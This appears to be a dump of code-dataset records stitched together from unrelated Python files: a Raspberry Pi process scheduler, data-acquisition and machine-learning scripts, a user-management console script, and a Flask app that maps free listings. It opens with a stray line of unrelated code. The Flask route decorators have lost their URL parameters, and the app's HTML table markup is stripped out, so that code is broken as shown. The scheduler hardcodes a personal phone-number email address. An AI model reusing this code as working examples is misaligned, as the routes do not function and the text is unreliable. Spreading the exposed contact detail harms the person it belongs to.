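best_ans = sims.index(min(sims))         # same argmin-by-cost rule as the script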
+{"seq_id":"19126549","text":"#!/usr/bin/env python\nimport time\nimport datetime\nimport os\nimport subprocess\nprint(\"Starting PySched\")\n\n#path1='/home/pi/git_repo/add_temp'\npath2='/home/pi/git_repo/python/drive_headless.py'\npath3='/home/pi/git_repo/arianna/weather.py'\n#path1='/home/pi/git_repo/sched/test_cont.py'\n#path2='/home/pi/git_repo/sched/test_int.py'\n\nlog=open('log','a+')\n\ndef error(message):\n\tfe=open('error_log','a+')\n\tfe.write(str(datetime.datetime.now())+\"\\t\"+message+\"\\n\")\n\tfe.close()\n\nclass Proc(object):\n\tglobal log\n\tdef __init__(self,_file,_mode):\n\t\tself.filename=_file\n\t\tself.mode=_mode\n\t\tself.process=self.start()\n\t\tself.last_start_time=time.localtime()\n\t\n\tdef start(self):\n\t\treturn subprocess.Popen([self.filename],stdout=log)\n\n\tdef print_status(self):\n\t\tprint(\"PID(\"+self.filename+\"): \"+str(self.process.pid))\n\n\tdef check(self):\n\t\tself.process.poll()\n\t\n\t\t#if mode is 0, always running, if there is exit status, then restart\n\t\tif self.mode==0:\n\t\t\t#print(\"Return Code: \"+str(self.process.returncode))\n\t\t\tif str(self.process.returncode) !='None':\n\t\t\t\terror(\"Restarting\"+self.filename+\" Exit Code: \"+str(self.process.returncode))\n\t\t\t\temail='echo \"'\n\t\t\t\temail+=\"Restarting:\"+self.filename+\"Exit Code: \"+str(self.process.returncode)\n\t\t\t\temail+='\" | ssmtp 5419905349@vtext.com'\n\t\t\t\tprint(email)\n\t\t\t\tos.system(email)\n\t\t\t\tself.process=self.start()\n\t\tself.process.poll()\n\tdef kill(self):\n\t\tif str(self.process.returncode) =='None':\n\t\t\tself.process.kill()\n\n\nerror(\"Starting Sched\")\np={Proc(path2,0),Proc(path3,0)}\n#p={Proc(path1,0)}\nx=0\nwhile True:\n\ttry:\n\t\tfor s in p:\n\t\t\ts.print_status()\n\t\t\tprint(\"\\n\")\n\t\t\ts.check()\n\t\t\t#if x==3:\n\t\t\t#\tprint(\"Killing all\")\n\t\t\t#\ts.process.kill()\n\t\ttime.sleep(5)\n\t\tx=x+1\n\texcept:\n\t\tfor s in p:\n\t\t\ts.kill()\n\nfor s in p:\n\ts.kill()\nprint(\"Exit PySched\")\n","sub_path":"pysched.py","file_name":"pysched.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"414994675","text":"#!/usr/bin/env python\n\n\"\"\" configure transient \n acq1014_configure_transient UUT1 UUT2 [NPOST] [trigger=int|ext|ext2]\n\"\"\"\n\nimport sys\nimport acq400_hapi\nimport argparse\nimport sets\n\ndef intSI(x):\n x = str(x)\n units = x.find('M')\n if units >= 0:\n return int(x[0:units])*1000000\n else:\n units = x.find('k')\n if units >= 0:\n return int(x[0:units])*1000\n else:\n return int(x)\n\n\n\ndef configure_shot(args):\n if len(args.uuts)%2:\n print(\"ERROR: must be an even number of uuts, minimum 2\")\n sys.exit(1)\n\n uuts = [acq400_hapi.Acq400(u) for u in args.uuts] \n mset = sets.Set(uuts[0:2])\n pre = intSI(args.pre)\n post = intSI(args.post)\n t_args = [args.trg.split(' ')[0], \n \"prepost\" if pre>0 else \"post\", \n \"falling\" if \"falling\" in args.trg else \"rising\"] \n c_args = args.clk.split(' ')\n if len(c_args) > 1:\n c_args[1] = intSI(c_args[1])\n if len(c_args) > 2:\n c_args[2] = intSI(c_args[2])\n c_args = [str(x) for x in c_args]\n\n for u in uuts:\n print(\"uut:%s\" % u.uut)\n u.s0.trace = 1\n u.s0.set_abort = 1;\n u.s0.transient = \"PRE=%d POST=%d SOFT_TRIGGER=0\" % (pre, post)\n\n u.s0.acq1014_select_trg_src = ' '.join(t_args)\n u.s0.acq1014_select_clk_src = ' '.join(c_args)\n\n u.s0.trace = 0\n\ndef run_main():\n parser = argparse.ArgumentParser(description='configure multiple acq1014')\n parser.add_argument('--pre', default=0, help=\"pre trigger length\")\n parser.add_argument('--post', default=100000, help=\"post trigger length\")\n parser.add_argument('--clk', default=\"int 80000000\", help='clk \"int|ext SR [CR]\"')\n parser.add_argument('--trg', default=\"int\", help='trg \"int|ext rising|falling\"')\n parser.add_argument('uuts', nargs='*', help=\"uut pairs: m1,m2 [s1,s2 ...]\")\n configure_shot(parser.parse_args())\n\n\n# execution starts here\n\nif __name__ == '__main__':\n run_main()\n\n","sub_path":"Source Code/Python API/acq1014_configure_transient.py","file_name":"acq1014_configure_transient.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"480412079","text":"#enconding: utf-8\n\nusers = { }\n\ntpl_title = '|{0:^10s}|{1:^10s}|{2:^5s}|{3:^15s}|'\ncolums_title = ('id','name','age','tel')\n\ntpl_body = '|{uid:^10d}|{name:^10s}|{age:^5d}|{tel:^15s}|'\n\ntitle = tpl_title.format(colums_title[0],colums_title[1],colums_title[2],colums_title[3])\nsplitline = '-' * len(title)\n\nwhile True:\n operate = input('请输入操作(add/delete/update/find/list/exit):')\n if operate == 'add':\n text = input('请输入用户信息:')\n nodes = text.split(',')\n if len(nodes) !=3:\n print('输入信息有误')\n else:\n if not nodes[1].isdigit():\n print('年龄有误')\n else:\n uid = 1\n if users:\n uid = max(users) + 1\n users[uid] = {'name':nodes[0],'age':int(nodes[1]),'tel':nodes[2]}\n print('添加成功')\n elif operate == 'delete':\n uid = input('请输入删除的用户ID:')\n if not uid.isdigit():\n print('输入信息有误')\n else:\n user = users.pop(int(uid),None)\n if user:\n print('删除成功')\n else:\n print('删除失败')\n elif operate == 'update':\n uid = input('请输入要修改的用户ID:')\n if not uid.isdigit() or int(uid) not in users:\n print('输入信息有误')\n else:\n text = input('请输入用户信息(不能改名字):')\n nodes = text.split(',')\n if len(nodes) !=2:\n print('输入信息有误')\n else:\n if not nodes[0].isdigit():\n print('年龄有误')\n else:\n uid = int(uid)\n users[uid]['age'] = nodes[0]\n users[uid]['tel'] = nodes[1]\n\n users[uid] = {'name':users[uid]['name'],'age':int(nodes[0]),'tel':nodes[1]}\n print('更改成功')\n elif operate == 'list':\n print(splitline)\n print(title)\n print(splitline)\n for key,value in users.items():\n print(tpl_body.format(uid=key,name=value['name'],age=value['age'],tel=value['tel']))\n print(splitline)\n elif operate == 'find':\n text = input('请输入查找的字符串:')\n for key,value in users.items():\n if text in value['name']:\n print(tpl_body.format(uid=key,name=value['name'],age=value['age'],tel=value['tel']))\n elif operate == 'exit':\n break","sub_path":"practice/prac1/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"474276352","text":"import argparse\nimport tensorflow as tf\nimport numpy as np\nfrom model import VBTA_semi as VBTA\nfrom utils import callback, simple_batch_generator_build_semi, make_dense\nfrom functools import partial\nimport os\nfrom get_data import get_data\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('train')\n parser.add_argument('--data', type=str, default='./mnist.npy', help='location of the data array')\n parser.add_argument('--out_path', type=str, default='./eval.npy',\n help='location of the data array for the evaulation')\n parser.add_argument('--model_save', type=str, default='./model', help='path to save model')\n parser.add_argument('--semi_supervised_size', type=int, default=10, help='size of labeled part of the dataset')\n parser.add_argument('--batch_size', type=int, default=50, help='batch size')\n parser.add_argument('--epoch_num', type=int, default=100, help='epoch num')\n parser.add_argument('--t_start', type=float, default=10.0, help='initial value of triplet coef')\n parser.add_argument('--t_end', type=float, default=10.0, help='final value of triplet coef')\n parser.add_argument('--cc_start', type=float, default=1.0, help='initial value of cc coef')\n parser.add_argument('--cc_end', type=float, default=1.0, help='final value of cc coef')\n parser.add_argument('--seed', type=int, default=42, help='random seed for the experiment repeatability ')\n args = parser.parse_args()\n\n if not os.path.exists(args.data):\n get_data(args.data)\n X_train, X_test, X_reverse_train, X_reverse_test, Labels_train, Labels_test = np.load(args.data)\n\n n_hidden = 512\n n_latent = 64\n acitv = tf.nn.relu\n n_input = X_train.shape[1]\n build_dict = {\n 'encoder_x': make_dense('encoder_x', n_hidden, acitv),\n 'encoder_y': make_dense('encoder_y', n_hidden, acitv),\n 'encoder_common_mean': make_dense('encoder_common_mean', n_latent, None),\n 'encoder_common_sigma': make_dense('encoder_common_sigma', n_latent, tf.nn.softplus),\n 'decoder_same': make_dense('decoder_same', n_hidden, acitv),\n 'decoder_x_mean': make_dense('decoder_x_mean', n_input, None),\n 'decoder_y_mean': make_dense('decoder_y_mean', n_input, None),\n }\n\n model = VBTA(n_input, n_latent, build_dict, triplet_coef=args.t_start,\n cc_coef=args.cc_start)\n rs = np.random.RandomState(args.seed)\n idx = range(X_train.shape[0])\n rs.shuffle(idx)\n semi = idx[:args.semi_supervised_size]\n\n batch_size = min(args.batch_size, args.semi_supervised_size)\n optimizer = tf.train.AdamOptimizer(10 ** (-4))\n batch_gen = simple_batch_generator_build_semi(X_train, X_reverse_train, semi,\n batch_size,\n args.epoch_num,\n model,\n args.t_start,\n args.cc_start,\n args.t_end,\n args.cc_end, rs)\n\n train_callback = partial(callback, X=X_test, Y=X_reverse_test, model_save=args.model_save)\n model.fit(optimizer, batch_gen, callback=train_callback, continue_train=False)\n model.save(args.model_save)\n # data for evaluation\n z_x = model.latent_x(X_test, noise=False)\n to_test = [t.reshape(28, 28).T.flatten() for t in model.decode_z_y(z_x)]\n np.save(args.out_path, to_test)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"321277878","text":"from sys import exit\n\nimport snake\n\nDEBUG = True\n\n# Prints error in red\n\n\ndef error(message='Unknown', token=None, raised=False):\n if token is not None:\n line, col = token.getLoc()\n print(f'\\033[91mLine {line}')\n print(snake.sourceRef[line - 1])\n print(' ' * (col - 1) + '^')\n errorType = 'Raised ' if raised else ''\n if DEBUG:\n print(f'{errorType}Error: {message}\\033[0m\\n')\n raise\n exit(f'{errorType}Error: {message}\\033[0m')\n","sub_path":"pySnake/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628741622","text":"\"\"\"Inference script for semantic segmentation by nearest neighbor retrievals.\n\"\"\"\nfrom __future__ import print_function, division\nimport os\nimport math\n\nimport PIL.Image as Image\nimport numpy as np\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom tqdm import tqdm\n\nimport spml.data.transforms as transforms\nimport spml.utils.general.vis as vis_utils\nimport spml.utils.general.common as common_utils\nimport spml.utils.general.others as other_utils\nimport spml.utils.segsort.others as segsort_others\nfrom spml.data.datasets.base_dataset import ListDataset\nfrom spml.config.default import config\nfrom spml.config.parse_args import parse_args\nfrom spml.models.embeddings.resnet_pspnet import resnet_50_pspnet, resnet_101_pspnet\nfrom spml.models.embeddings.resnet_deeplab import resnet_50_deeplab, resnet_101_deeplab\nfrom spml.models.predictions.segsort import segsort\nfrom spml.models.crf import DenseCRF\n\ncudnn.enabled = True\ncudnn.benchmark = True\n\n\ndef separate_comma(str_comma):\n ints = [int(i) for i in str_comma.split(',')]\n return ints\n\n\ndef main():\n \"\"\"Inference for semantic segmentation.\n \"\"\"\n # Retreve experiment configurations.\n args = parse_args('Inference for semantic segmentation.')\n config.network.kmeans_num_clusters = separate_comma(args.kmeans_num_clusters)\n config.network.label_divisor = args.label_divisor\n\n # Create directories to save results.\n semantic_dir = os.path.join(args.save_dir, 'semantic_gray')\n semantic_rgb_dir = os.path.join(args.save_dir, 'semantic_color')\n\n # Create color map.\n color_map = vis_utils.load_color_map(config.dataset.color_map_path)\n color_map = color_map.numpy()\n\n # Create data loaders.\n test_dataset = ListDataset(\n data_dir=args.data_dir,\n data_list=args.data_list,\n img_mean=config.network.pixel_means,\n img_std=config.network.pixel_stds,\n size=None,\n random_crop=False,\n random_scale=False,\n random_mirror=False,\n training=False)\n test_image_paths = test_dataset.image_paths\n\n # Create models.\n if config.network.backbone_types == 'panoptic_pspnet_101':\n embedding_model = resnet_101_pspnet(config).cuda()\n elif config.network.backbone_types == 'panoptic_deeplab_101':\n embedding_model = resnet_101_deeplab(config).cuda()\n else:\n raise ValueError('Not support ' + config.network.backbone_types)\n\n if config.network.prediction_types == 'segsort':\n prediction_model = segsort(config)\n else:\n raise ValueError('Not support ' + config.network.prediction_types)\n\n embedding_model = embedding_model.to(\"cuda:0\")\n prediction_model = prediction_model.to(\"cuda:0\")\n embedding_model.eval()\n prediction_model.eval()\n \n # Load trained weights.\n model_path_template = os.path.join(args.snapshot_dir, 'model-{:d}.pth')\n save_iter = config.train.max_iteration - 1\n embedding_model.load_state_dict(\n torch.load(model_path_template.format(save_iter))['embedding_model'],\n resume=True)\n prediction_model.load_state_dict(\n torch.load(model_path_template.format(save_iter))['prediction_model'])\n\n # Define CRF.\n postprocessor = DenseCRF(\n iter_max=args.crf_iter_max,\n pos_xy_std=args.crf_pos_xy_std,\n pos_w=args.crf_pos_w,\n bi_xy_std=args.crf_bi_xy_std,\n bi_rgb_std=args.crf_bi_rgb_std,\n bi_w=args.crf_bi_w,)\n\n # Load memory prototypes.\n semantic_memory_prototypes, semantic_memory_prototype_labels = None, None\n if args.semantic_memory_dir is not None:\n semantic_memory_prototypes, semantic_memory_prototype_labels = (\n 
segsort_others.load_memory_banks(args.semantic_memory_dir))\n semantic_memory_prototypes = semantic_memory_prototypes.to(\"cuda:0\")\n semantic_memory_prototype_labels = semantic_memory_prototype_labels.to(\"cuda:0\")\n\n # Remove ignore class.\n valid_prototypes = torch.ne(\n semantic_memory_prototype_labels,\n config.dataset.semantic_ignore_index).nonzero()\n valid_prototypes = valid_prototypes.view(-1)\n semantic_memory_prototypes = torch.index_select(\n semantic_memory_prototypes,\n 0,\n valid_prototypes)\n semantic_memory_prototype_labels = torch.index_select(\n semantic_memory_prototype_labels,\n 0,\n valid_prototypes)\n\n # Start inferencing.\n with torch.no_grad():\n for data_index in tqdm(range(len(test_dataset))):\n # Image path.\n image_path = test_image_paths[data_index]\n base_name = os.path.basename(image_path).replace('.jpg', '.png')\n\n # Image resolution.\n original_image_batch, original_label_batch, _ = test_dataset[data_index]\n image_h, image_w = original_image_batch['image'].shape[-2:]\n batches = other_utils.create_image_pyramid(\n original_image_batch, original_label_batch,\n scales=[0.5, 0.75, 1, 1.25, 1.5],\n is_flip=True)\n\n semantic_topks = []\n for image_batch, label_batch, data_info in batches:\n resize_image_h, resize_image_w = image_batch['image'].shape[-2:]\n # Crop and Pad the input image.\n image_batch['image'] = transforms.resize_with_pad(\n image_batch['image'].transpose(1, 2, 0),\n config.test.crop_size,\n image_pad_value=0).transpose(2, 0, 1)\n image_batch['image'] = torch.FloatTensor(\n image_batch['image'][np.newaxis, ...]).to(\"cuda:0\")\n pad_image_h, pad_image_w = image_batch['image'].shape[-2:]\n\n # Create the fake labels where clustering ignores 255.\n fake_label_batch = {}\n for label_name in ['semantic_label', 'instance_label']:\n lab = np.zeros((resize_image_h, resize_image_w),\n dtype=np.uint8)\n lab = transforms.resize_with_pad(\n lab,\n config.test.crop_size,\n image_pad_value=config.dataset.semantic_ignore_index)\n\n fake_label_batch[label_name] = torch.LongTensor(\n lab[np.newaxis, ...]).to(\"cuda:0\")\n\n # Put label batch to gpu 1.\n #for k, v in label_batch.items():\n # label_batch[k] = torch.LongTensor(v[np.newaxis, ...]).to(\"cuda:0\")\n\n # Create the ending index of each patch.\n stride_h, stride_w = config.test.stride\n crop_h, crop_w = config.test.crop_size\n npatches_h = math.ceil(1.0 * (pad_image_h-crop_h) / stride_h) + 1\n npatches_w = math.ceil(1.0 * (pad_image_w-crop_w) / stride_w) + 1\n patch_ind_h = np.linspace(\n crop_h, pad_image_h, npatches_h, dtype=np.int32)\n patch_ind_w = np.linspace(\n crop_w, pad_image_w, npatches_w, dtype=np.int32)\n\n # Create place holder for full-resolution embeddings.\n embeddings = {}\n counts = torch.FloatTensor(\n 1, 1, pad_image_h, pad_image_w).zero_().to(\"cuda:0\")\n for ind_h in patch_ind_h:\n for ind_w in patch_ind_w:\n sh, eh = ind_h - crop_h, ind_h\n sw, ew = ind_w - crop_w, ind_w\n crop_image_batch = {\n k: v[:, :, sh:eh, sw:ew] for k, v in image_batch.items()}\n\n # Feed-forward.\n crop_embeddings = embedding_model.generate_embeddings(\n crop_image_batch, resize_as_input=True)\n\n # Initialize embedding.\n for name in crop_embeddings:\n if crop_embeddings[name] is None:\n continue\n crop_emb = crop_embeddings[name].to(\"cuda:0\")\n if name in ['embedding']:\n crop_emb = common_utils.normalize_embedding(\n crop_emb.permute(0, 2, 3, 1).contiguous())\n crop_emb = crop_emb.permute(0, 3, 1, 2)\n else:\n continue\n\n if name not in embeddings.keys():\n embeddings[name] = 
torch.FloatTensor(\n 1,\n crop_emb.shape[1],\n pad_image_h,\n pad_image_w).zero_().to(\"cuda:0\")\n embeddings[name][:, :, sh:eh, sw:ew] += crop_emb\n counts[:, :, sh:eh, sw:ew] += 1\n\n for k in embeddings.keys():\n embeddings[k] /= counts\n\n # KMeans.\n lab_div = config.network.label_divisor\n fake_sem_lab = fake_label_batch['semantic_label'][..., :resize_image_h, :resize_image_w]\n fake_inst_lab = fake_label_batch['instance_label'][..., :resize_image_h, :resize_image_w]\n embs = embeddings['embedding'][..., :resize_image_h, :resize_image_w]\n clustering_outputs = embedding_model.generate_clusters(\n embs,\n fake_sem_lab,\n fake_inst_lab)\n embeddings.update(clustering_outputs)\n\n # Generate predictions.\n outputs = prediction_model(\n embeddings,\n {'semantic_memory_prototype': semantic_memory_prototypes,\n 'semantic_memory_prototype_label': semantic_memory_prototype_labels},\n with_loss=False, with_prediction=True)\n semantic_topk = common_utils.one_hot(\n outputs['semantic_score'], config.dataset.num_classes).float()\n semantic_topk = torch.mean(semantic_topk, dim=1)\n semantic_topk = semantic_topk.view(resize_image_h, resize_image_w, -1)\n semantic_topk = (\n semantic_topk.data.cpu().numpy().astype(np.float32))\n semantic_topk = cv2.resize(\n semantic_topk, (image_w, image_h), interpolation=cv2.INTER_LINEAR)\n if data_info['is_flip']:\n semantic_topk = semantic_topk[:, ::-1]\n semantic_topks.append(semantic_topk)\n\n # Save semantic predictions.\n semantic_topks = np.stack(semantic_topks, axis=0).astype(np.float32)\n semantic_prob = np.mean(semantic_topks, axis=0)\n semantic_prob = semantic_prob.transpose(2, 0, 1)\n\n # DenseCRF post-processing.\n image = original_image_batch['image'].astype(np.float32)\n image = image.transpose(1, 2, 0)\n image *= np.reshape(config.network.pixel_stds, (1, 1, 3))\n image += np.reshape(config.network.pixel_means, (1, 1, 3))\n image = image * 255\n image = image.astype(np.uint8)\n\n semantic_prob = postprocessor(image, semantic_prob)\n\n semantic_pred = np.argmax(semantic_prob, axis=0).astype(np.uint8)\n\n semantic_pred_name = os.path.join(semantic_dir, base_name)\n if not os.path.isdir(os.path.dirname(semantic_pred_name)):\n os.makedirs(os.path.dirname(semantic_pred_name))\n Image.fromarray(semantic_pred, mode='L').save(semantic_pred_name)\n\n semantic_pred_rgb = color_map[semantic_pred]\n semantic_pred_rgb_name = os.path.join(\n semantic_rgb_dir, base_name)\n if not os.path.isdir(os.path.dirname(semantic_pred_rgb_name)):\n os.makedirs(os.path.dirname(semantic_pred_rgb_name))\n Image.fromarray(semantic_pred_rgb, mode='RGB').save(\n semantic_pred_rgb_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pyscripts/inference/inference_crf_msc.py","file_name":"inference_crf_msc.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
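The sliding-window arithmetic in the inference loop above (math.ceil for the patch count, then np.linspace over patch end-indices) is easy to check in isolation. For a hypothetical 1000-pixel padded side with 321-pixel crops and stride 240:

import math
import numpy as np

pad, crop, stride = 1000, 321, 240
npatches = math.ceil(1.0 * (pad - crop) / stride) + 1
ends = np.linspace(crop, pad, npatches, dtype=np.int32)
print(ends)    # [ 321  547  773 1000]; each window covers [end - crop, end)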
+{"seq_id":"409583866","text":"\"\"\"\n\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Fenimore\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\nPURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\nLIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE\nOR OTHER DEALINGS IN THE SOFTWARE.\n\n\n\"\"\"\n\n\nimport os\nfrom datetime import datetime\n\nimport folium\nfrom flask import Flask, render_template, send_from_directory, request\n\nfrom freestuffs.stuff_scraper import StuffScraper\nfrom freestuffs.stuff_charter import StuffCharter\nfrom city_list import CITIES\n\n# initialization\napp = Flask(__name__)\napp.config.update(\n DEBUG = True,\n)\n\ndef refine_city_name(location):\n \"\"\"display User-friendly city name\"\"\"\n if location == 'newyork': # does this have to capitalized\n loc = 'New York'\n elif location == 'washingtondc':\n loc = 'Washington D.C.'\n elif location == 'sanfrancisco':\n loc = 'San Francisco'\n else:\n loc = location\n return loc\n\n\"\"\"Routes\"\"\"\n@app.route('/favicon.ico')\ndef favicon():\n \"\"\"Serve favicon\"\"\"\n return send_from_directory(os.path.join(app.root_path, 'static'), 'ico/favicon.ico')\n\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"Render 404.\"\"\"\n return render_template('404.html'), 404\n\n@app.route(\"/\")\ndef index():\n \"\"\"Render index.\"\"\"\n return render_template('index.html')\n\n\n@app.route(\"/cities\")\ndef list_cities():\n \"\"\"Display valid city names.\"\"\"\n cities_list = ''\n cities_list +='| User-Friendly Name | Valid for Url |
'\n for key, value in CITIES.items() :\n cities_list +=''\n cities_list += ('| ' + str(key) + ' | ' + str(value) + ' | ')\n cities_list +='
'\n cities_list += '
'\n return cities_list\n\n\n@app.route('/')\ndef list_stuff(location):\n \"\"\"Display listings\"\"\"\n stuffs = StuffScraper(location, 9).stuffs\n things =[]\n for x in range(9):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n refined_loc = refine_city_name(location)\n return render_template('view.html', things=things, location=location, rlocation=refined_loc)\n # location = location... brilliant\n\n\n@app.route('//map')\ndef show_map(location):\n \"\"\"Display 10 items in given city, default\"\"\"\n # FIXME: Digitalocean takes wayyy too long with 9\n stuffs = StuffScraper(location, 5, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(9): # Display listings on map\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n return render_template('map.html', location=location, things=things)\n\n@app.route('//map/')\ndef show_map_more(location, quantity):\n \"\"\"Display a specified amount of stuffs on map\"\"\"\n startTime = datetime.now() # time speed of script\n stuffs = StuffScraper(location, quantity, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(int(quantity)):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n score = datetime.now() - startTime # efficacy?\n return render_template('map.html', location=location, things=things, score=score)\n\n@app.route('/me', methods=['POST'])\ndef me():\n if request.method == 'POST':\n location = request.form['location']\n address = request.form['address']\n #address = address + ', ' + location # this messes up if the city isn't the same as the address\n stuffs = StuffScraper(location, 9, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, address=address, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(9):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n return render_template('map.html', location=location, things=things, address=address)\n\n\n# launch\nif __name__ == \"__main__\":\n port = 
int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n\n# Form for searching items\n# Form takes in city, as well?\n","sub_path":"treasuremap.py","file_name":"treasuremap.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
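The repaired routes above use Flask path converters; the angle-bracket placeholders had been stripped as HTML by extraction (hence the double slashes). Note that a plain <quantity> placeholder arrives as a string, which is why the view casts with int(quantity); the int: converter does the cast for you. A minimal sketch with a hypothetical app, not the treasure-map code:

from flask import Flask

app = Flask(__name__)

@app.route('/<location>/map/<int:quantity>')
def show(location, quantity):
    # the int: converter hands the view an int, so range(quantity) just works
    return '{} items in {}'.format(quantity, location)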
+{"seq_id":"451486690","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n Created on Tue Feb 6 12:41:01 2018\n \n @ Author: Jose Jesus Torronteras Hernandez\n @ Github: https://github.com/xexuew\n @ Name: Get Train Test Data\n @ Description: \n\"\"\"\n\nimport numpy as np\nimport csv\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nclass GetTrainTestData(object):\n \n def __init__(self, config):\n \n self.PATH = config['PATH_CONFIGURATION']['NUMPY_PATH']\n\n self.SIZE = int(config['DATA_CONFIGURATION']['DATA_SIZE'])\n self.SPLIT_SIZE = float(config['DATA_CONFIGURATION']['SPLIT_SIZE'])\n self.MULTIDIM = int(config['DATA_CONFIGURATION']['MULTIDIMENSIONAL_ARR'])\n\n #\n # Description:\n # Input:\n # Output:\n def get_features(self, genre):\n\n aux_list = []\n limit = 0\n print(\"Getting..\" + self.PATH + genre)\n \n with open(self.PATH + \"url.csv\") as f:\n\n for key, path in csv.reader(f):\n\n if key == genre:\n try:\n arr_aux = np.load(path)\n \n except UnicodeDecodeError as e:\n print(path)\n print (\"Error occurred\" + str(e))\n \n limit = limit + 1\n if limit == self.SIZE: # See config.py -> DATA_SIZE\n break\n \n aux_list.append(arr_aux)\n \n # if MULTIDIMENSIONAL_ARR is True we want a 3D array (*, * , *) for Neural Network\n if self.MULTIDIM:\n features_arr = aux_list\n else:\n features_arr = np.vstack(aux_list)\n \n return features_arr \n\n #\n # Description:\n # Input:\n # Output:\n def split_dataset(self):\n \n arr_blues = self.get_features('blues')\n arr_classical = self.get_features('classical')\n arr_country = self.get_features('country')\n arr_disco = self.get_features('disco')\n arr_hiphop = self.get_features('hiphop')\n arr_jazz = self.get_features('jazz')\n arr_metal = self.get_features('metal')\n arr_pop = self.get_features('pop')\n arr_reggae = self.get_features('reggae')\n arr_rock = self.get_features('rock')\n\n # All songs arrays\n features = np.vstack((arr_blues,\\\n arr_classical,\\\n arr_country,\\\n arr_disco,\\\n arr_hiphop,\\\n arr_jazz,\\\n arr_metal,\\\n arr_pop,\\\n arr_reggae,\\\n arr_rock))\n\n\n # Labels that identifies the musical genre\n labels = np.concatenate((np.zeros(len(arr_blues)),\\\n np.ones(len(arr_classical)),\\\n np.full(len(arr_country), 2),\\\n np.full(len(arr_disco), 3),\\\n np.full(len(arr_hiphop), 4),\\\n np.full(len(arr_jazz), 5),\\\n np.full(len(arr_metal), 6),\\\n np.full(len(arr_pop), 7),\\\n np.full(len(arr_reggae), 8),\\\n np.full(len(arr_rock), 9)))\n\n # Transforms features by scaling each feature to a given range.\n features = MinMaxScaler().fit_transform(features.reshape(-1, 625)).reshape(features.shape[0], 128, 625)\n\n # With train_test_split() it is more easier obtain the necessary elements for the later learning.\n print(\"test-size = \" + str(self.SPLIT_SIZE) + \" Change value in config.py\") # We can change the size in the config file.\n print(\"data-size = \" + str(self.SIZE) + \" Change value in config.py\") # We can change the size in the config file.\n\n X_train, X_test, y_train, y_test = train_test_split(\n features,\n labels,\n test_size = self.SPLIT_SIZE,\n random_state = 0,\n stratify = labels)\n\n print(\"X_train Tamaño: %s - X_test Tamaño: %s - y_train Tamaño: %s - y_test Tamaño: %s\" % (X_train.shape, X_test.shape, y_train.shape, y_test.shape))\n\n return X_train, X_test, y_train, y_test\n 
","sub_path":"src/Get_Train_Test_Data.py","file_name":"Get_Train_Test_Data.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
